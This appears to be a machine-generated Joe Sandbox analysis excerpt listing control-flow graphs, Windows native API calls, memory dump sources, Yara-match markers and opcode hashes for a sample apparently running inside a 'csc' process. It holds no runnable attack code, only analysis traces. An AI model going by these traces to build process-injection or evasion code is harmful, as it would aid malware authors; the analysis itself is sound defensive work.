                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 245 40acf0-40ad0c 246 40ad14-40ad19 245->246 247 40ad0f call 41cc50 245->247 248 40ad1b-40ad1e 246->248 249 40ad1f-40ad2d call 41d070 246->249 247->246 252 40ad3d-40ad4e call 41b4a0 249->252 253 40ad2f-40ad3a call 41d2f0 249->253 258 40ad50-40ad64 LdrLoadDll 252->258 259 40ad67-40ad6a 252->259 253->252 258->259
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                  • String ID:

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 266 41a35b-41a3b1 call 41af60 NtCreateFile
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 270 41a360-41a376 271 41a37c-41a3b1 NtCreateFile 270->271 272 41a377 call 41af60 270->272 272->271
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 274 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                                                                                                                                  • Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 380244249e30e48bed52489ab0cccc2f0ae94ce953f922e222d3df04aefc450a
                                                                                                                                                                                                                                                                                  • Instruction ID: f94d865fa48c7c900a877e934f53759655318122d1ab3251600b043190d118dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 380244249e30e48bed52489ab0cccc2f0ae94ce953f922e222d3df04aefc450a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E9002B160100403E540715845447C6001987D0305F91C815A5054558EC6AA8DD57665
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fefa8ab065fc55f61f15d487ba4c3f7f300e948352d2083434848ec40f64af9b
                                                                                                                                                                                                                                                                                  • Instruction ID: dfca44f715e57e42a5fbbb6e797771cd1bc655fb6517c82ec20b2bd133e5e8af
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fefa8ab065fc55f61f15d487ba4c3f7f300e948352d2083434848ec40f64af9b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB900261A0100503E50171584544696001E87D0245FD1C826A1014559ECA768D92B131
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 483b4c0148de94a4703cc3e0ef3cf8f3e600176d5b30f5e74fd207a39fe913c1
                                                                                                                                                                                                                                                                                  • Instruction ID: 6623fd9da072df30454456aa019b5d2da12bb5db9bca409c7fa3a85ed455115d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 483b4c0148de94a4703cc3e0ef3cf8f3e600176d5b30f5e74fd207a39fe913c1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E90027160100413E51161584644787001D87D0245FD1CC16A041455CDD6A78D52B121
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bc8f5d7427bf77d7e6d12ff3b8bdfad981f18ef135a52f08cc7fb75941bc0002
                                                                                                                                                                                                                                                                                  • Instruction ID: fc40d0cd1ff4be0902b1ca07a14417ac9eebff38d26a0aaabcd5d4b318e5e0d7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8f5d7427bf77d7e6d12ff3b8bdfad981f18ef135a52f08cc7fb75941bc0002
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F9002A174100443E50061584554B860019C7E1305F91C819E1054558DC66ACC527126
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 48a5f607d73f58a3ee11feee484582bd3a7642efdb527e29d3d7b28f2376d028
                                                                                                                                                                                                                                                                                  • Instruction ID: f25b87e6192524c8d350792012ad0dffd283f10b05b9ea2085603204a18bb5f5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a5f607d73f58a3ee11feee484582bd3a7642efdb527e29d3d7b28f2376d028
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48900265611000031505A5580744587005A87D5355B91C825F1005554CD6728C616121
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ab459bd483962c38d6ac9e0914ceb5202a79e12e5cb31dd9becafefa543b0272
                                                                                                                                                                                                                                                                                  • Instruction ID: fff6c22e24804b2ad7507568a19d10c6013835947dc51b7ab1efc689e70acee7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab459bd483962c38d6ac9e0914ceb5202a79e12e5cb31dd9becafefa543b0272
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2190027160100403E500659855486C6001987E0305F91D815A5014559EC6B68C917131
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: b1e195a029fe1dda135110b3f09d2f06fcec75bb5405d10d3c8bc3ef3d7158ff
                                                                                                                                                                                                                                                                                  • Instruction ID: 3f276009b201deb1f9441b678468e19e979688f649ed5d5d9c747b84238fa9ec
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1e195a029fe1dda135110b3f09d2f06fcec75bb5405d10d3c8bc3ef3d7158ff
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8890027160108803E510615885447CA001987D0305F95CC15A441465CDC6E68C917121
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: a423fe58b2d0bdcde5160fe7f5c7a7d11094825a9298505a8c491660e8dcf255
                                                                                                                                                                                                                                                                                  • Instruction ID: 72d64deb1b972ec24e27c6af47ac07587c8e8f26f18112998e6c196c87e0dede
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a423fe58b2d0bdcde5160fe7f5c7a7d11094825a9298505a8c491660e8dcf255
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A290027160100803E580715845446CA001987D1305FD1C819A0015658DCA668E5977A1
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bf0535e8a5f3d06db141d7f61c7c1f8bf4be5f96471c5f39639aa4bed8feb16c
                                                                                                                                                                                                                                                                                  • Instruction ID: 379f9f4c43d96f32d1798749c62b20a91060329a1c238a47be2cabe7de4d3bfa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf0535e8a5f3d06db141d7f61c7c1f8bf4be5f96471c5f39639aa4bed8feb16c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B69002A160200003550571584554696401E87E0205F91C825E1004594DC5768C917125
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 9 41a6ab-41a6ac 11 41a64c-41a661 RtlAllocateHeap 9->11 12 41a647 call 41af60 9->12 12->11
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                                                                  • Opcode ID: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                                                                                                                                  • Instruction ID: ca5c2ad009bb5830261af26d6cd8d5f5f20ef4a650c85af14dc2c9a9921a2f81
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D02BF91092845FD700DF74DD808DB7754AF85318738844EF84D03303C130D426A6B2

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 215 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 224 40835c-40836e PostThreadMessageW 215->224 225 40838e-408392 215->225 226 408370-40838a call 40a480 224->226 227 40838d 224->227 226->227 227->225
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                  • Opcode ID: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                                                                                                                                                                                                                                                                  • Instruction ID: deec3d3271cf7ae617df0fac63ab8d80f0a55d98960cf64c01aa098855739ce5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
